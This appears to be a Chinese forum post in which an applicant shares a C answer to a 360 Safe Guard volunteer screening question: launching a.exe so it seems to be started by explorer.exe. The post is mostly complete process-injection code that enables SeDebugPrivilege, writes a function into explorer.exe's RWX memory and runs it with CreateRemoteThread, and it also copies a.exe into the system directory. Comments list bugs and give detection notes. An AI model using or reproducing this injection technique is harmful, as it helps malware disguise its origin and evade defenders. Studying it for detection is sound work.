参加360安全卫士程序员志愿者的测试题目与答案，不知对不对。

非常感谢您对360 安全卫士的关注和热爱,也非常感谢您对反恶意软件工作的支持!

由于报名志愿者很多,因此我们需要对报名者的开发水平有一定的考核,请您理解!

请您完成如下题目:

================================================================

编写一个程序,在此程序中运行 a.exe,并使得a.exe认为是由explorer.exe运行它的。

================================================================

给出程序的核心代码即可。


////////////////////////////////////////////////////////////////////////////////////////////////
//
// 目的:编写一个程序,在此程序中运行a.exe,并使得a.exe认为是由explorer.exe运行它的
// Code By:Gleon Email:WinAsk@Gmail.com
/////////////////////////////////////////////////////////////////////////////
	#include <stdio.h>
	#include <windows.h>
	#include <tlhelp32.h>
struct MPARA                                // parameter block that main() copies into the target process and hands to the remote thread
{
	DWORD M_LoadLibrary;                    // address of kernel32!LoadLibraryA, filled in by main(); FRP casts it but never calls it
	DWORD M_GetProcAddress;                 // address of kernel32!GetProcAddress, filled in by main(); FRP casts it but never calls it
	DWORD m_cr&#101;ateProcess;              // address of kernel32!CreateProcessA; the only pointer FRP actually invokes
	                                        // ("&#101;" in this identifier is an HTML entity for 'e' left by the page extraction; the
	                                        //  source read CreateProcess) -- DWORD-sized addresses mean a 32-bit build is assumed
	char path[20];                          // command line handed to CreateProcessA ("a.exe" in main()); fixed 20-byte buffer
	STARTUPINFO si;                         // zeroed by main() except wShowWindow; note main() never sets si.cb
	PROCESS_INFORMATION pi;                 // written by CreateProcessA inside the target; nothing ever reads it back

};

// Remote thread body. main() copies the bytes of this function into explorer.exe and starts a
// thread on them (see main), so everything it touches comes through the MPARA block `p`.
// All it does is call CreateProcessA with p->path as the command line, which is what makes the
// new process appear as a child of explorer.exe. Defender's note: the child's parent PID is
// therefore not trustworthy provenance; the observable anomaly is the remote thread itself,
// whose start address lies outside any module loaded in explorer.exe.
DWORD _stdcall FRP(MPARA *p)                          // remote function
{
	// Function-pointer typedefs for LoadLibraryA and GetProcAddress (assigned below, never used)
    HMODULE (_stdcall *M_LoadLibrary)(char *c);
	FARPROC (_stdcall *M_GetProcAddress)(HMODULE hmd,char *c);
	BOOL (_stdcall *m_cr&#101;ateProcess)(
  LPCTSTR lpApplicationName,// pointer to name of executable module
  LPTSTR lpCommandLine,  // pointer to command line string
  LPSECURITY_ATTRIBUTES lpProcessAttributes,  // process security attributes
  LPSECURITY_ATTRIBUTES lpThreadAttributes,   // thread security attributes
  BOOL bInheritHandles,  // handle inheritance flag
  DWORD dwCreationFlags, // creation flags
  LPVOID lpEnvironment,  // pointer to new environment block
  LPCTSTR lpCurrentDirectory,   // pointer to current directory name
  LPSTARTUPINFO lpStartupInfo,  // pointer to STARTUPINFO
  LPPROCESS_INFORMATION lpProcessInformation  // pointer to PROCESS_INFORMATION
);

	// Recover the API addresses that main() resolved in the injecting process. This presumes
	// kernel32 is mapped at the same base in both processes -- not checked anywhere.
	M_LoadLibrary=(HMODULE (_stdcall *)(char *c))p->M_LoadLibrary;
	M_GetProcAddress=(FARPROC (_stdcall *)(HMODULE hmd,char
		*c))p->M_GetProcAddress;
	m_cr&#101;ateProcess=(BOOL (_stdcall *)(
  LPCTSTR lpApplicationName,// pointer to name of executable module
  LPTSTR lpCommandLine,  // pointer to command line string
  LPSECURITY_ATTRIBUTES lpProcessAttributes,  // process security attributes
  LPSECURITY_ATTRIBUTES lpThreadAttributes,   // thread security attributes
  BOOL bInheritHandles,  // handle inheritance flag
  DWORD dwCreationFlags, // creation flags
  LPVOID lpEnvironment,  // pointer to new environment block
  LPCTSTR lpCurrentDirectory,   // pointer to current directory name
  LPSTARTUPINFO lpStartupInfo,  // pointer to STARTUPINFO
  LPPROCESS_INFORMATION lpProcessInformation  // pointer to PROCESS_INFORMATION
))p->m_cr&#101;ateProcess;
	// Spawn p->path from inside the target. bInheritHandles is 1, so the child inherits
	// explorer.exe's inheritable handles; the return value is discarded and p->pi is never read.
	// (The original comment here, "define the network functions needed", was stale.)
	(*m_cr&#101;ateProcess)(NULL,p->path,NULL,NULL,1,0,NULL,NULL,&p->si,&p->pi);

 return 0;
}
// Return the PID of the first running process whose image name matches `pn` (case-insensitive
// via stricmp), or 0 when none is found.
// Shortcomings visible here: the Toolhelp snapshot handle is never closed on either path, and
// `hnd` is not checked for INVALID_HANDLE_VALUE before Process32First is called on it.
unsigned long getprocid(char *pn)
{
	BOOL b;
	HANDLE hnd;
	PROCESSENTRY32 pe;

	hnd=cr&#101;ateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);   // "&#101;" is an extraction artefact for 'e'

	pe.dwSize=sizeof(pe);                                    // Toolhelp requires dwSize to be set before the first call
	b=Process32First(hnd,&pe);
	while(b)
	{
		if(stricmp(pn,pe.szExeFile)==0)return pe.th32ProcessID;   // first match wins; snapshot handle leaks here
		b=Process32Next(hnd,&pe);
	}

	return 0;                                                // not found; snapshot handle leaks here too
}

// Try to enable SeDebugPrivilege on the current process token so OpenProcess on another user's
// process can succeed. Every call's result is ignored and TRUE is returned unconditionally, so
// the caller cannot tell whether the privilege was actually granted (it is absent from a
// non-administrator token, and AdjustTokenPrivileges then silently leaves it disabled).
// The token handle is never closed. Enabling SeDebugPrivilege right before opening explorer.exe
// with full access is a sequence privilege-use auditing and EDR telemetry should surface.
BOOL SetAut()            // elevate privileges
{
	HANDLE hProcessToken;

	OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken);   // result unchecked

	TOKEN_PRIVILEGES tp;
	LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid);         // result unchecked

	tp.PrivilegeCount=1;
	tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;

	AdjustTokenPrivileges(hProcessToken,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),0,0);   // result unchecked

	return TRUE;         // always TRUE, regardless of the calls above
}

// Entry point. Copies a.exe from the current directory into the system directory, then performs
// a textbook CreateRemoteThread injection into explorer.exe: allocate RWX memory there, copy the
// bytes of FRP into it, copy an MPARA block alongside, and start a thread on the copied code so
// that explorer.exe launches "a.exe" on this program's behalf.
// For defenders, the VirtualAllocEx(PAGE_EXECUTE_READWRITE) + WriteProcessMemory +
// CreateRemoteThread triad against explorer.exe is the detection point (e.g. Sysmon event 8);
// do not treat explorer.exe as a trustworthy parent on its own.
// `void main()` is non-standard; the process also leaks the explorer handle and never waits on
// or cleans up what it created.
void main()
{
	HANDLE hnd;
	DWORD dwtid;
	struct MPARA mp;
	char CurrentPath[255];
	char SystemPath[255];
	unsigned long ThreadSize=4028*2;                 // fixed 8056-byte count, NOT the real size of FRP
	GetSystemDirectory(SystemPath,sizeof(SystemPath));
	strcat(SystemPath,"\\a.exe");                    // unbounded strcat into a 255-byte buffer
	GetCurrentDirectory(sizeof(CurrentPath),CurrentPath);
	strcat(CurrentPath,"\\a.exe");                   // unbounded strcat into a 255-byte buffer
	printf("%s\n%s\n",CurrentPath,SystemPath);
	CopyFile(CurrentPath,SystemPath,1);              // bFailIfExists=1; result unchecked, so an existing copy is silently kept
	SetAut();/*elevate process privileges*/
	DWORD procid;
procid=getprocid("Explorer.EXE");
/*obtain the target PID*/
	if(procid==0)return;
	hnd=OpenProcess(PROCESS_ALL_ACCESS,FALSE,procid);   // NULL on failure; never checked, never closed

	/*write the thread body*/
	// Copies ThreadSize bytes starting at FRP's address, so this takes whatever follows FRP in this
	// image as well (or truncates FRP if it is larger). The allocation is never freed.
	void *lpEx=VirtualAllocEx(hnd,NULL,ThreadSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(hnd,lpEx,&FRP,ThreadSize,NULL);

	/*initialise the thread parameters*/

	// Addresses are resolved in this process and reused in the target (see FRP for the assumption).
	mp.M_LoadLibrary=(DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"LoadLibraryA");
	mp.m_cr&#101;ateProcess =(DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"cr&#101;ateProcessA");   // "&#101;" = 'e' (extraction artefact)
	printf("%d \n",	mp.m_cr&#101;ateProcess);           // %d with a DWORD; debug output
	printf("%d \n",mp.M_LoadLibrary);               // %d with a DWORD; debug output
//	exit(1);
	mp.M_GetProcAddress=(DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"GetProcAddress");
	strcpy(mp.path,"a.exe");                         // bare name, so the target resolves it through its own search path
	ZeroMemory(&mp.pi,sizeof(mp.pi));
	ZeroMemory(&mp.si,sizeof(mp.si));
	mp.si.wShowWindow=SW_SHOW;                       // si.cb is left at 0 and STARTF_USESHOWWINDOW is not set
	/*write the thread parameters*/
	void *lpPa=VirtualAllocEx(hnd,NULL,sizeof(mp),MEM_COMMIT,PAGE_READWRITE);
	WriteProcessMemory(hnd,lpPa,&mp,sizeof(mp),NULL);

	/*create the thread*/
	// Start address is the copied code, parameter is the copied MPARA. The returned thread handle
	// is dropped and the program exits without waiting for the remote thread.
	cr&#101;ateRemoteThread(hnd,0,0,(DWORD (_stdcall *)(void *p))lpEx,lpPa,0,&dwtid);

}

不知道对不对.!!错误的请提示 [confused] [confused] [confused]
谢谢
